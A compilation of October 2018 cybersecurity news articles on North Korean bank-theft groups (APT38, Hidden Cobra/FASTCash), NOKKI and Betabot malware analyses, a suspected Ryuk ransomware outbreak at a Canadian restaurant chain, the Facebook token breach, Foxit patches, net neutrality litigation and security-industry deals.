4.10.2018 securityaffairs
APT

Security experts from FireEye published a report on the activity of financially motivated threat actors, tracked as APT38, linked to the North Korean government.
The attacks aimed at financial institutions, FireEye estimates APT38 has stolen at least a hundred million dollars from banks worldwide.

APT38 appears to be a North Korea-linked group separate from the infamous Lazarus group, it has been active since at least 2014 and it has been observed targeting over 16 organizations across 11 countries.

APT38

The report attributed the string of attacks against the SWIFT banking system to the APT38, including the hack of Vietnam’s TP Bank in 2015, Bangladesh’s central bank in 2016, Taiwan’s Far Eastern International in 2017, Bancomext in Mexico in 2018, and Banco de Chile in 2018.

“APT38 is a financially motivated group linked to North Korean cyber espionage operators, renown for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware.” reads the report published by FireEye.

“Attribution to both the “Lazarus” group and TEMP.Hermit was made with varying levels of confidence primarily based on similarities in malware being leveraged in identified operations. Over time these malware similarities diverged, as did targeting, intended outcomes, and TTPs, almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship.”

According to FireEye, the APT38 was targeting banks worldwide to allows the North Korean government to obtain new cash bypassing sanctions imposed on Pyongyang by foreign states.

“Based on observed activity, we judge that APT38’s primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime. Increasingly heavy and pointed international sanctions have been levied on North Korea following the regime’s continued weapons development and testing.” continues the report.

“The pace of APT38 activity probably reflects increasingly desperate efforts to steal funds to pursue state interests, despite growing economic pressure on Pyongyang.”

Experts believe the activity of the group will continue in the future, likely adopting new sophisticated tactics to avoid detection.

“Based on the large scale of resources and vast network dedicated to compromising targets and stealing funds over the last few years, we believe APT38’s operations will continue in the future,” concludes FireEye.

“In particular, the number of SWIFT heists that have been ultimately thwarted in recent years coupled with growing awareness for security around the financial messaging system could drive APT38 to employ new tactics to obtain funds especially if North Korea’s access to currency continues to deteriorate.”


US offers its cyber warfare defense capabilities to NATO
4.10.2018 securityaffairs
BigBrothers

The United States will offer its offensive cyber capabilities to NATO to strengthen its defenses against threat actors like Russian ones.
The United States is expected to announce to provide cyber warfare capabilities to NATO to strengthen its defenses against threat actors like Russian ones.

The announcement is expected today at a meeting of defence ministers in Brussels, the decision follows the public commitment of Britain and Denmark in providing cyber resources to NATO.

According to NATO chief Jens Stoltenberg, cyber attacks against members of the alliance are increasing in frequency and complexity, for this reason, it is essential to approach them with joint effort and mutual collaboration.

Attackers are able to interfere with the political processes of the countries, it has already happened during the 2016 Presidential election, and threaten critical infrastructure worldwide.

[cyber attacks on NATO countries were becoming] “more frequent… more sophisticated… more coercive” [and any contribution of cyber capabilities was welcome.] said Stoltenberg.

“We see cyber being used to meddle in domestic political processes, attacks against critical infrastructure, and cyber will be an integral part of any future military conflict,” Stoltenberg said.

The critical infrastructure of Lithuania, Latvia and Estonia are under incessant attacks that they attribute to Russia.

Russia-linked APR groups are blamed of interference in some European elections and 2018 US midterm election

The US intelligence accused the Kremlin of conducting a disinformation campaign in Macedonia through social media aimed at sabotage referendum on changing the country’s name that could open the door of the NATO alliance to the country.


Canadian restaurant chain Recipe suffered a network outage, is it a ransomware attack?
4.10.2018 securityaffairs
Ransomware

The Canadian restaurant chain Recipe Unlimited that operates over 20 restaurant brands has suffered a major IT outage over the weekend in a “malware outbreak.”
The company operates nearly 1,400 restaurants under 19 different brands in Canada,

Recipe Unlimited has suffered a major malware-based attack that impacted several of its brands.

On Monday the company Monday confirmed that a malware is the root cause of a partial network outage at nine of its franchises, including Swiss Chalet, Harvey’s, East Side Mario’s, and Kelseys.

Recipe discovered the malware outbreak on September 28 and immediately started the incident response procedure. A number of systems have been taken offline, and all the locations infected by the ransomware were isolated from the Internet.

The affected locations continued to process card transactions manually,

The infections have caused the closure of a “small number” of restaurants for a “temporary period of time.”

“A limited number of Recipe Unlimited restaurants are currently experiencing a partial network outage. Only certain restaurants under the Swiss Chalet, Harvey’s, Milestones, Kelseys, Montana’s, Bier Markt, East Side Mario’s, The Landing Group of Restaurants and Prime Pubs brands have been impacted.” reads a statement published by the company.

“We learned of the malware outbreak on Friday, September 28 and immediately initiated steps to prevent any further spread and take appropriate precautionary measures. As a result, we have taken a number of our systems offline and suspended internet access to affected locations as a precaution. This caused some of our restaurants to experience some service delay related issues, including being unable to process credit and debit card transactions. However, all of those restaurants are able to manually process credit card charges. A smaller number of affected restaurants have decided to close for a temporary period of time to avoid inconvenience to guests due to service issues.”

According to the CBC News, the Recipe was the victim of a ransomware attack, the media also shared a copy of a ransom note that was provided by a worker at one of the affected restaurants.

“All of our computer systems crashed,” said a worker on shift at the time at an affected location. “The ransom note appeared under the file, ‘read me‘ in a WordPad format. We were all really in a state of shock.”

The hackers claim that they encrypted the files using “the strongest military algorithms,” at the time there is no info related to an amount of bitcoin requested to the victims.

The amount requested by the crooks will increase with the time.

“The final price depends on how fast you write to us,” warns the ransom note. “Every day of delay will cost you additional +0.5 BTC.”

Recipe Unlimited denies it was victim of a ransomware attac, because it conducts regular system backups to promptly mitigate such kind of attacks.

“We maintain appropriate system and data security measures,” said spokesperson Maureen Hart in an email.

Canadian restaurant chain Recipe

According to Hart, the ransom note published online is a “generic” statement associated with a virus called Ryuk, and other copies of the note can be found via a Google search.

The ransom note is associated with Ryuk ransomware, a threat discovered by security experts at Check Point in August. At the time, the ransomware-based campaign aimed at organizations around the world conducted by North Korea-linked threat actor.

The campaign appears as targeted and well-planned, crooks targeted several enterprises and encrypted hundreds of PC, storage and data centers in each infected company.


California Law Sets Up Fresh Legal Clash Over 'Net Neutrality'
4.10.2018 securityweek
BigBrothers

The US Justice Department's lawsuit to block a California law aimed at ensuring all online data to be treated equally sets up a legal clash over so-called "net neutrality" and the authority to regulate the internet.

California Governor Jerry Brown on Sunday signed the law that re-established net neutrality in his state, the country's largest and home to some of the largest online firms including Facebook and Google.

Within hours, the Trump administration sued to block the law, calling it an illegal infringement over federal authority.

"Under the constitution, states do not regulate interstate commerce -- the federal government does. Once again the California legislature has enacted an extreme and illegal state law attempting to frustrate federal policy," Attorney General Jeff Sessions said in a statement announcing the lawsuit.

The moves open up a new legal clash over net neutrality rules, which have been the subject of a contentious battle for over a decade.

Net neutrality backers argue that a law is needed to guard against that broadband providers like Verizon and AT&T favoring their own services and blocking or slowing rival services like Netflix.

"This law will prevent internet service providers from unduly influencing internet traffic, thereby allowing Californians to continue to decide what content they want and when they want it, and allowing the online market to continue to flourish," said Eric Null of the New America Foundation's Open Technology Institute.

But critics claim restrictions will chill investment needed to ensure that new high-speed networks are built and innovative services offered.

Federal Communications Commission chairman Ajit Pai countered that the California law "hurts consumers" and infringes on federal authority.

"The law prohibits many free-data plans, which allow consumers to stream video, music, and the like exempt from any data limits," Pai said.

"The internet is free and open today, and it will continue to be under the light-touch protections" of current federal rules.

Long, winding road

The FCC adopted net neutrality rules twice starting in 2009, in both cases struck down by the courts which said the agency had no authority to regulate internet firms. A third effort in 2015 withstood a court challenge when the FCC reclassified broadband firms as telecom providers.

But last year, under Trump appointee Pai, the FCC reversed course and repealed net neutrality rules, which prompted several states to began their own efforts.

Stanford University law professor Barbara van Schewick said she believes the California law will withstand the federal challenge and set a standard that will be followed in the US and around the world.

Van Schewick said in a blog post that while an FCC 2017 order explicitly bans states from adopting their own net neutrality laws, "that preemption is invalid."

"An agency that has no power to regulate has no power to preempt the states, according to case law," she said.

The law also marks the latest challenge between Brown's administration and President Donald Trump's Republicans, who have already clashed over environmental and immigration regulations.

USTelecom, which represents companies in the broadband sector, said it supports net neutrality but disagreed with the California law.

"Rather than 50 states stepping in with their own conflicting open internet solutions, we need Congress to step up with a national framework for the whole internet ecosystem and resolve this issue once and for all," the industry group said.


Tanium Raises $200 Million at $6.5 Billion Valuation
4.10.2018 securityweek
IT

Emeryville, CA-based endpoint security and systems management firm Tanium announced on Tuesday that it has raised an additional $200 million through the sale of common stock, which raises the company’s pre-money valuation to $6.5 billion.

The funding round was led by Wellington Management along with Baillie Gifford & Company and Adage Capital Management, and brings the total amount raised by the company to nearly $800 million.

Founded in 2007, Tanium has been a hot candidate for an initial public offering (IPO), but appears to have put that idea on the back burner, noting that some of the funding “may be used to provide early investor and employee liquidity.”

When asked by if an IPO was on the horizon, Fazal Merchant, COO and CFO at Tanium, told SecurityWeek, “An IPO needs to be a natural evolution of the business. Typical reasons, such as the need for liquidity, aren’t relevant to Tanium at the moment. So, we’re going to maintain focus on the three things that will help ensure our success continues: customers, product, and our people.”

The company said it had approximately $320 million in cash and equivalents as of Jan. 31, 2018, and positive operating cash flow of $25 million.

It also said that its Annual Recurring Revenue of approximately $230 million was up over 80% from the prior year.

Tanium offers a platform that collects and processes billions of metrics across endpoints in real-time, which lets enterprises quickly identify the change the state of endpoints, which can help IT do everything from pinpoint and fix operational issues, to fend off cyberattacks.

In April 2017, the company came under fire when it was accused of exposing a California hospital’s network in a sales demos without client permission.


Foxit Reader Update Patches Over 100 Vulnerabilities
4.10.2018 securityweek
Vulnerebility

The newly released Foxit Reader 9.3 brings along patches for over 100 security flaws, including some that could result in remote code execution.

Developed by California-based Foxit Software, the Foxit Reader is a multilingual freemium tool that allows users to create, view, edit, digitally sign, and print Portable Document Format (PDF) files. According to the company, the reader has hundreds of millions of users.

The latest version of the reader, Foxit reveals in an advisory, brings patches for a broad range of vulnerabilities, including out-of-bounds, use-after-free, information disclosure, type confusion, and memory corruption bugs, the most severe of which could result in remote code execution.

The vulnerabilities, Foxit says, could be exploited when parsing strings, when executing certain JavaScript, due to the use of objects which have been deleted or closed, when handling certain properties of annotation objects, or when opening or processing malicious PDF documents.

18 of the vulnerabilities were disclosed by security researchers with Cisco Talos, all of which could be exploited for either remote or arbitrary code execution. The bugs impact the JavaScript engine of the Reader and can be exploited with the help of a specially crafted, malicious PDF either open in the application itself or in a browser, if the browser plugin is enabled.

Most of the remaining security vulnerabilities addressed with this update were discovered by security researchers working with Trend Micro's Zero Day Initiative.

The bugs are said to impact version 9.2.0.9297 and earlier of Foxit Reader and Foxit PhantomPDF and have been addressed with the release of Foxit Reader 9.3 and Foxit PhantomPDF 9.3.

The security updates arrived only days before Adobe released tens of patches for its own PDF tools. On Monday, the company announced the availability of Acrobat DC and Acrobat Reader DC (Continuous) 2019.008.20071, Acrobat 2017 and Reader DC 2017 (Classic 2017) 2017.011.30105, and Acrobat DC and Reader DC (Classic 2015) 2015.006.30456, which address a total of 86 vulnerabilities


Researchers Link New NOKKI Malware to North Korean Actor
4.10.2018 securityweek
Virus

A recently observed variant of the KONNI malware appears tied to a remote access Trojan (RAT) previously attributed to a North Korean actor, Palo Alto Networks security researchers say.

Dubbed NOKKI, the new malware family shows close resemblance and code overlaps with KONNI, a piece of malware long used in attacks targeting the Korean peninsula, and is likely the work of the same developer. The threat has been in use since at least January 2018 and shows ties to the threat group known as Reaper, Palo Alto Networks reveals in a recent post.

NOKKI, the security researchers discovered, was designed to collect a broad range of information from the infected machine (includes IP address, hostname, username, drive information, operating system information, and details on the installed programs), can drop additional malware onto the system, and can also execute decoy documents.

Starting in January, the researchers observed several attacks involving NOKKI, targeting entities in Cambodia and Russia with documents featuring content related to local political matters.

In a report published this week, Palo Alto Networks reveals that NOKKI is related to the DOGCALL malware family, a backdoor previously attributed to the Reaper group and likely in use by this group only. The actor is known for targeting the military and defense industry within South Korea, as well as a Middle Eastern organization doing business with North Korea.

By analyzing malicious macros within Microsoft Word documents designed to drop NOKKI, the researchers discovered that the employed deobfuscation technique was also used in documents targeting individuals interested in the World Cup hosted in Russia in 2018 with the DOGCALL malware.

While the NOKKI dropper samples would fetch both a payload and a decoy document, the World Cup malware sample would download and execute a remote VBScript file wrapped in HTML, while also appending text to the original Word document to provide the lure for the victim.

The VBScript file leverages the same unique deobfuscation routine, and fetches and executes a dropper called Final1stspy, which in turn downloads a payload belonging to the DOGCALL malware family.

When installed on a compromised machine, the threat can take screenshots, log keys, capture microphone data, collect victim information, collect files of interest, and download and execute additional payloads.

Communication with the command and control (C&C) is performed via third-party hosting services such as Dropbox, pCloud, Yandex Cloud, and Box.

“What originally began as research surrounding a new malware family named NOKKI that had code overlap and other ties to KONNI lead us to an interesting discovery tying the NOKKI malware family to the Reaper threat actor group. Additionally, we discovered yet another malware family that has not been previously publicly reported that we have named Final1stspy,” Palo Alto Networks concludes.


Facebook Says No Apps Were Accessed in Recent Hack
4.10.2018 securityweek
Social

Facebook has shared another update on the hacker attack disclosed last week. The social media giant says there is no evidence that the attackers accessed any third-party apps.

Facebook revealed on September 28 that it had reset the access tokens for 90 million accounts, including 50 million that were directly impacted and 40 million deemed at risk.

Hackers obtained access tokens for nearly 50 million accounts after exploiting three distinct bugs in the View As feature, which shows users how others see their profile, and a video uploader interface introduced in July 2017. The vulnerability was patched and Facebook informed users in its initial blog post that it had found no evidence of misuse, but noted that its investigation is ongoing.

The company admitted that the attackers could have accessed not only Facebook accounts with the compromised tokens, but also third-party apps that use Facebook login. Resetting the tokens eliminated the risk of unauthorized access to these applications, but Facebook still had to figure out if any apps were accessed during the attack.

A blog post published by the company on Tuesday said there was no evidence of unauthorized access to apps based on an analysis of logs for all third-party apps installed or logged in during the attack.

Facebook has also created a tool to help developers determine if any of their users have been impacted.

“Any developer using our official Facebook SDKs — and all those that have regularly checked the validity of their users’ access tokens – were automatically protected when we reset people’s access tokens,” explained Guy Rosen, VP of Product Management at Facebook. “However, out of an abundance of caution, as some developers may not use our SDKs — or regularly check whether Facebook access tokens are valid — we’re building a tool to enable developers to manually identify the users of their apps who may have been affected, so that they can log them out.”

Facebook has advised developers to use its official SDKs for Android, iOS and JavaScript as these automatically check the validity of access tokens, and log their users out of the app when error codes show an invalid session.

Facebook has yet to provide any information on the attackers and their motives, and the attack does not appear to be targeted at a specific country or region.

The social media giant faces lawsuits and government investigations as a result of the incident, and the company’s stock has been steadily falling since the disclosure of the breach. It dropped from nearly $169 on September 27 to just over $159 on Tuesday.


Apple Chief Says Firm Guards Data Privacy in China
4.10.2018 securityweek
Apple

Apple chief executive Tim Cook on Tuesday said the company is devoted to protecting people's privacy, with data encrypted and locked away on servers even in China.

Cook called privacy as one of the most important issues of this century, and maintained that the US-based technology colossus even safeguards data Chinese law requires it to keep stored in that country.

"We worked with a Chinese company to provide iCloud," Cook said, referring to Apple's service for storing digital content in the internet cloud during an interview with Vice News.

"But, the keys to the data are ours."

Cook said Apple hosts data on servers in an array of countries, but it is not easy for local authorities to get access. China is known for tight internet controls, prompting worries about the privacy of data stored there by Apple.

When asked about a recent security breach revealed by Facebook, Cook once again championed the importance of protecting people's information in a time when smartphones can reveal so much about them.

Cook has repeatedly stressed that Apple's business model does not involve gathering user data and targeting them with ads, the way internet giants Facebook and Google make money.

"You are not our product," Cook said.

"We don't create a profile and allow other companies to target you. That is not the business we are in."

Apple, valued at more than a trillion dollars based on its share price, makes most of its money from iPhone sales. The Silicon Valley company has been working to ramp up revenue from digital content and online services, such as streaming music and data storage.

Cook said that while he is a fan of the free market, he supports the idea of legislation aimed at protecting people's privacy.

"I think there is a need to work with Congress and the staff to make sure we do our jobs of helping them come up to speed on what's possible," Cook said.

"Technology itself doesn't want to be good. It doesn't want to be bad. It doesn't want to be anything. It is up to the creator."


U.S. Links North Korean Government to ATM Hacks
4.10.2018 securityweek
BigBrothers

U.S. Shares Details on North Korea’s ATM Cash-out Scheme

The United States Department of Homeland Security (DHS), Department of the Treasury (Treasury), and Federal Bureau of Investigation (FBI) this week released a joint technical alert to share information on an Automated Teller Machine (ATM) cash-out scheme attributed to the North Korean government.

The financially-motivated malicious campaign was attributed to the North Korea-linked threat actor the U.S. government refers to as Hidden Cobra, but which is better known in the infosec community as the Lazarus Group.

Considered the most serious threat to banks, the actor is believed to have orchestrated the $81 million heist from the Bangladesh bank. This year, the group was said to have been involved in numerous attacks against financial institutions and banks and to have also shown interest in crypto-currencies.

Last year, the U.S. started sharing details on the activity associated with Hidden Cobra, including information on the tools the actor employs in attacks, including malware such as Typeframe, Joanap and Brambul, Fallchil, and others. In September, U.S. authorities charged a North Korean national over his alleged involvement with Lazarus.

The most recent alert issued by the U.S. government on Hidden Cobra details FASTCash, a set of tactics the group has been using since at least 2016 to target banks in Africa and Asia and maintain presence on the victims’ networks for further exploitation.

As part of the FASTCash schemes, hackers remotely compromise payment switch application servers within banks to perform fraudulent transactions. The use of these tactics was highly successful and the group is expected to continue using them to target retail payment systems vulnerable to remote exploitation.

“According to a trusted partner’s estimation, HIDDEN COBRA actors have stolen tens of millions of dollars. In one incident in 2017, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs located in over 30 different countries. In another incident in 2018, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries,” the joint alert reads.

The actor allegedly configured and deployed legitimate scripts on compromised servers to intercept legitimate financial requests and reply to them with fraudulent responses. The group leveraged knowledge of the standard for financial transaction messaging and other tactics to exploit the targeted systems.

The deployed scripts apparently inspected inbound financial request messages for specific primary account numbers (PANs) and could generate fraudulent responses only for the requests that matched the expected PANs.

While the initial infection vector hasn’t been identified, Lazarus is known for the use of spear-phishing emails in targeted attacks against bank employees and might have employed Windows-based malware “to explore a bank’s network to identify the payment switch application server.” Lateral movement was likely performed leveraging legitimate credentials.

Alongside the joint alert, the DHS also published a malware analysis report (MAR-10201537) to provide details on the malware Hidden Cobra used as part of the FASTCash attacks. Of a total of 10 files submitted for analysis, four were found to be malicious, 2 were command-line utility applications, 3 were apps offering export functions and methods to interact with financial systems, and 1 was a log file.

The identified malicious programs include Trojans and various backdoors that could retrieve system information, find and manipulate files, execute and terminate processes, download and upload files, and execute commands. In addition to Windows, the Trojans targeted IBM’s Advanced Interactive Executive (AIX) platform, which was running on the compromised payment switch application servers.

The FASTCash scheme only appears to have targeted banks in Africa and Asia, with no incidents observed in the U.S.


NKorea Said to Have Stolen a Fortune in Online Bank Heists
4.10.2018 securityweek
APT

North Korea’s nuclear and missile tests have stopped, but its hacking operations to gather intelligence and raise funds for the sanction-strapped government in Pyongyang may be gathering steam.

U.S. security firm FireEye raised the alarm Wednesday over a North Korean group that it says has stolen hundreds of millions of dollars by infiltrating the computer systems of banks around the world since 2014 through highly sophisticated and destructive attacks that have spanned at least 11 countries. It says the group is still operating and poses “an active global threat.”

It is part of a wider pattern of malicious state-backed cyber activity that has led the Trump administration to identify North Korea — along with Russia, Iran and China — as one of the main online threats facing the United States. Last month, the Justice Department charged a North Korean hacker said to have conspired in devastating cyberattacks, including an $81 million heist of Bangladesh’s central bank and the WannaCry virus that crippled parts of Britain’s National Health Service.

On Tuesday, the U.S. Department of Homeland Security warned of the use of malware by Hidden Cobra, the U.S. government’s byword for North Korea hackers, in fraudulent ATM cash withdrawals from banks in Asia and Africa. It said that Hidden Cobra was behind the theft of tens of millions of dollars from teller machines in the past two years. In one incident this year, cash had been simultaneously withdrawn from ATMs in 23 different countries, it said.

North Korea, which prohibits access to the world wide web for virtually all its people, has previously denied involvement in cyberattacks, and attribution for such attacks is rarely made with absolute certainty. It is typically based on technical indicators such as the Internet Protocol addresses that identify computers and characteristics of the coding used in malware, which is the software a hacker may use to damage or disable computers.

But other cybersecurity experts tell The Associated Press that they also see continued signs that North Korea’s authoritarian government, which has a long track record of criminality to raise cash, is conducting malign activity online. That activity includes targeting of financial institutions and crypto-currency-related organizations, as well as spying on its adversaries, despite the easing of tensions between Pyongyang and Washington.

“The reality is they are starved for cash and are continuing to try and generate revenue, at least until sanctions are diminished,” said Adam Meyers, vice president of intelligence at CrowdStrike. “At the same time, they won’t abate in intelligence collection operations, as they continue to negotiate and test the international community’s resolve and test what the boundaries are.”

CrowdStrike says it has detected continuing North Korean cyber intrusions in the past two months, including the use of a known malware against a potentially broad set of targets in South Korea, and a new variant of malware against users of mobile devices that use a Linux-based operating system.

This activity has been taking place against the backdrop of a dramatic diplomatic shift as Kim Jong Un has opened up to the world. He has held summits with South Korean President Moon Jae-in and with President Donald Trump, who hopes to persuade Kim to relinquish the nuclear weapons that pose a potential threat to the U.S. homeland. Tensions on the divided Korean Peninsula have dropped and fears of war with the U.S. have ebbed. Trump this weekend will dispatch his top diplomat, Mike Pompeo, to Pyongyang for the fourth time this year to make progress on denuclearization.

But North Korea has yet to take concrete steps to give up its nuclear arsenal, so there’s been no let-up in sanctions that have been imposed to deprive it of fuel and revenue for its weapons programs, and to block it from bulk cash transfers and accessing to the international banking system.

FireEye says APT38, the name it gives to the hacking group dedicated to bank theft, has emerged and stepped up its operations since February 2014 as the economic vise on North Korea has tightened in response to its nuclear and missile tests. Initial operations targeted financial institutions in Southeast Asia, where North Korea had experience in money laundering, but then expanded into other regions such as Latin America and Africa, and then extended to Europe and North America.

In all, FireEye says APT38 has attempted to steal $1.1 billion, and based on the data it can confirm, has gotten away with hundreds of millions in dollars. It has used malware to insert fraudulent transactions in the Society for Worldwide Interbank Financial Telecommunication or SWIFT system that is used to transfer money between banks. Its biggest heist to date was $81 million stolen from the central bank of Bangladesh in February 2016. The funds were wired to bank accounts established with fake identities in the Philippines. After the funds were withdrawn they were suspected to have been laundered in casinos.

The Foundation for Defense of Democracies, a Washington think tank, said in a report Wednesday that North Korea’s cyber capabilities provide an alternative means for challenging its adversaries. While Kim’s hereditary regime appears to prioritize currency generation, attacks using the SWIFT system raise concerns that North Korean hackers “may become more proficient at manipulating the data and systems that undergird the global financial system,” it says.

Sandra Joyce, FireEye’s head of global intelligence, said that while APT38 is a criminal operation, it leverages the skills and technology of a state-backed espionage campaign, allowing it to infiltrate multiple banks at once and figure how to extract funds. On average, it dwells in a bank’s computer network for 155 days to learn about its systems before it tries to steal anything. And when it finally pounces, it uses aggressive malware to wreak havoc and cover its tracks.

“We see this as a consistent effort, before, during and after any diplomatic efforts by the United States and the international community,” said Joyce, describing North Korea as being “undeterred” and urging the U.S. government to provide more specific threat information to financial institutions about APT38′s modus operandi. APT stands for Advanced Persistent Threat.

The Silicon Valley-based company says it is aware of continuing, suspected APT38 operations against other banks. The most recent attack it is publicly attributing to APT38 was against of Chile’s biggest commercial banks, Banco de Chile, in May this year. The bank has said a hacking operation robbed it of $10 million.

FireEye, which is staffed with a roster of former military and law-enforcement cyberexperts, conducted malware analysis for a criminal indictment by the Justice Department last month against Park Jin Hyok, the first time a hacker said to be from North Korea has faced U.S. criminal charges. He’s accused of conspiring in a number of devastating cyberattacks: the Bangladesh heist and other attempts to steal more than $1 billion from financial institutions around the world; the 2014 breach of Sony Pictures Entertainment; and the WannaCry ransomware virus that in 2017 infected computers in 150 countries.


Tesco Bank Fined by UK Regulator Over Hacking
4.10.2018 securityweek
Hacking

Britain's Tesco Bank has been fined £16.4 million ($21.4 million, 18.4 million euros) for failing to protect customers during a 2016 cyber attack, regulators said Monday.

The supermarket's bank division failed "to exercise due skill, care and diligence in protecting its personal current account holders against a cyber attack", the Financial Conduct Authority said in a statement.

The attackers netted £2.26 million during the 48-hour incident in November 2016, according to the watchdog.

Tesco Bank in UK: Image Credit: Tesco Bank

The attack "exploited deficiencies" in the design of Tesco Bank's debit card, as well as its financial crime controls and financial crime operations team, it said.

Tesco Bank customers were therefore left vulnerable to what the regulator described as a largely avoidable incident.

"The fine the FCA imposed on Tesco Bank today reflects the fact that the FCA has no tolerance for banks that fail to protect customers from foreseeable risks," said Mark Steward, FCA executive director of enforcement and market oversight.

"In this case, the attack was the subject of a very specific warning that Tesco Bank did not properly address until after the attack started.

"This was too little, too late. Customers should not have been exposed to the risk at all."


Palo Alto Networks to Acquire Cloud Security Firm RedLock for $173 Million
4.10.2018 securityweek
IT

Palo Alto Networks on Wednesday announced that it has entered a definitive agreement to acquire cloud security company RedLock for roughly $173 million in cash.

The acquisition is expected to be completed in Palo Alto Networks’ first fiscal quarter. RedLock co-founders Varun Badhwar and Gaurav Kumar will join Palo Alto Networks as part of the deal.

RedLock’s AI-powered Cloud 360 platform helps organizations protect their public cloud environments by providing deep visibility, threat detection, risk prioritization, remediation, and incident response capabilities.

Palo Alto Networks already provides a wide range of security services for cloud environments. Its offering was expanded earlier this year following the acquisition of Evident.io for $300 million in cash.

It now plans on combining Evident and RedLock technologies to provide a single offering that encompases cloud security analytics, continuous security, threat detection, and compliance monitoring. The new offering is expected to become available early next year.

“We are thrilled to add RedLock's technology to our cloud security offerings,” said Nikesh Arora, chairman and CEO of Palo Alto Networks. “The addition of their technologies allows us to offer the most comprehensive security for multi-cloud environments, including Amazon Web Services, Google Cloud Platform and Microsoft Azure, and significantly strengthens our cloud strategy going forward.”


Betabot - An Example of Cheap Modern Malware Sophistication
4.10.2018 securityweek
Virus

What appears to be a new campaign delivering the Betabot malware has been detected by security researchers. It doesn't look as if this campaign is directly related to the wide-ranging campaign disclosed by Kaspersky Lab in August. However, like the Kaspersky campaign, this one also uses phishing as the original point of infection.

"The campaign doesn't seem directly related to the Kaspersky report," Assaf Dahan, senior director, threat hunting at Cybereason's Nocturnus Research told SecurityWeek. "The TTPs are quite different. The campaign discussed in our report seems less targeted, and originates from generic phishing emails."

Cybereason does not know who is behind the new campaign. "Since Betabot's source code and old builders are available online in hacking forums (or new ones sold rather cheaply ~200$), it is hard to estimate who is behind it," added Dahan.

"The Betabot infections seen in our telemetry originated from phishing campaigns that used social engineering to persuade users to download and open what appears to be a Word document that is attached to an email," explains the report.

Betabot, also known as Neurevt, first appeared in late 2012. "The malware began as a banking Trojan," writes Dahan, "and is now packed with features that allow its operators to practically take over a victim's machine and steal sensitive information." Its main features include a form grabber, FTP and mail client stealer, banking, USB infection, Userland rootkit, command execution via shell, additional malware downloads, persistence, and a crypto-currency miner (which was added in late 2017).

It attempts to be persistent and to hide its presence by using all the tricks available, including anti-debugging, anti-virtual machine/sandbox, anti-disassembly and the ability to detect security products and analysis tools. It also seeks to find and eliminate any other malware on the system "with heuristic approaches that would put many security products to shame."

The infection chain starts with social engineering designed to get users to download and open what appears to be an attached Word document. It exploits an 18-year-old vulnerability in the Equation Editor tool in Microsoft Office, that was patched in 2017 (CVE-2017-11882).

If successful, what is a weaponized RTF document executes dqfm.cmd, which spawns hondi.cmd. Hondi does preparatory work and executes the Betabot dropper, mondi.exe. This extracts the Betabot loader and the encrypted main payload, and injects it into its own child process. Betabot then examines all running processes to find additional injection candidates.

"In many of the cases Cybereason observed," writes Dahan, "the Betabot loader injected its code into multiple running processes for persistence and maximized survival purposes. If an injected process is terminated, another process will kick in and spawn the loader as a child process."

While the first candidate is usually a second instance of explorer.exe, Cybereason has seen Betabot injecting itself into a McAfee process called shtat.exe. Once injected, Betabot attempts to connect to its C2 servers.

Cybereason describes Betabot as paranoid, doing everything it can to prevent detection and maintain persistence. It seeks to detect a virtual environment by querying the registry and looking for the names of virtual machine vendors such as VMware, VirtualBox and Parallels, as well as searching for specific drivers' vendor files. It also checks for indications of a sandbox, and attempts to prevent debugging.

Betabot attempts to detect -- and sometimes remove -- 30 different leading anti-malware products. Apart from trying to neutralize threats to its presence, it also seeks to eliminate rival malware (which could attract the attention of security teams).

"Betabot will attempt to detect other bots and malware on the infected host," writes Dahan, "by looking for common malware persistence patterns and other heuristic features. For example, Betabot will enumerate registry autorun keys to look for suspicious-looking persistence indicators that are common in malware."

It even has a routine that looks for script-based fileless malware persistence patterns.

Boston, MA-based Cybereason raised $100 million in Series D funding from SoftBank Corp in June 2017, bringing the total investment in the cyber-attack detection firm to $189 million since it was founded in 2012.


Researchers associated the recently discovered NOKKI Malware to North Korean APT
3.10.2018 securityaffairs
APT

Security experts from Palo Alto Networks have collected evidence that links the recently discovered NOKKI malware to North Korea-Linked APT.
Researchers from Palo Alto Networks have spotted a new variant of the KONNI malware, tracked as NOKKI. that was attributed to North Korea-linked attackers.

NOKKI borrows the code from the KONNI malware, the latter is a remote access Trojan (RAT) used in targeted attacks on organizations linked to North Korea, while NOKKI was used to target politically-motivated victims in Eurasia and Southeast Asia.

“KONNI,” was undetected for more than 3 years, it was able to avoid detection due to a continuous evolution, the recent versions capable of executing arbitrary code on the target systems and stealing data.

The NOKKI variant has been in use since at least January 2018, experts attributed it to the Reaper group.

“Beginning in early 2018, Unit 42 observed a series of attacks using a previously unreported malware family, which we have named ‘NOKKI’.” reads the analysis published by the Palo Alto Networks.

“The malware in question has ties to a previously reported malware family named KONNI, however, after careful consideration, we believe enough differences are present to introduce a different malware family name. To reflect the close relationship with KONNI, we chose NOKKI, swapping KONNI’s Ns and Ks.”

NOKKI is able to gather a broad range of data (i.e. IP address, Hostname, Username, Drive Information, Operating System Information, Installed Programs) from the infected systems, it is also able to fetch and execute a payload, as well as to drop and open decoy documents.

The malicious code writes the collected information to LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp.

In January, the researchers observed several attacks involving the NOKKI malware that targeted Cambodian speakers with an interest in Cambodian political matters and Russia with documents written Cyrillic featuring content related to local political issues.

A few days ago, researchers from Palo Alto Networks published another report that associated the NOKKI malware with the DOGCALL backdoor attributed to the Reaper group.

The analysis of the macros included in the Microsoft Word decoy documents revealed that they were designed to drop the NOKKI malware, they employed a deobfuscation technique that was also used in documents targeting individuals interested in the World Cup hosted in Russia in 2018 with the DOGCALL malware.

“Based on the original filename, we can surmise this malware sample targeted individuals interested in the World Cup hosted in Russia in 2018. As we can see in the figure below, the unique deobfuscation routine used between the samples is identical, including the comments included by the author.” reads the report published by Palo Alto Networks.

NOKKI vs WordCup malware

“While the deobfuscation routine was identical, the actual functionality of the macro differed slightly. The NOKKI dropper samples downloaded both a payload and a decoy document, but this World Cup predictions malware sample downloads and executes a remote VBScript file wrapped in HTML and appends text to the original Word document to provide the lure for the victim.”

The VBScript file used the same deobfuscation routine and fetches and executes a dropper tracked as Final1stspy that in turn downloads a strain of the DOGCALL malware.

The malware implements backdoor features, can take screenshots, log keystrokes, enable the microphone, collect victim information, collect files of interest, and download and execute additional payloads.

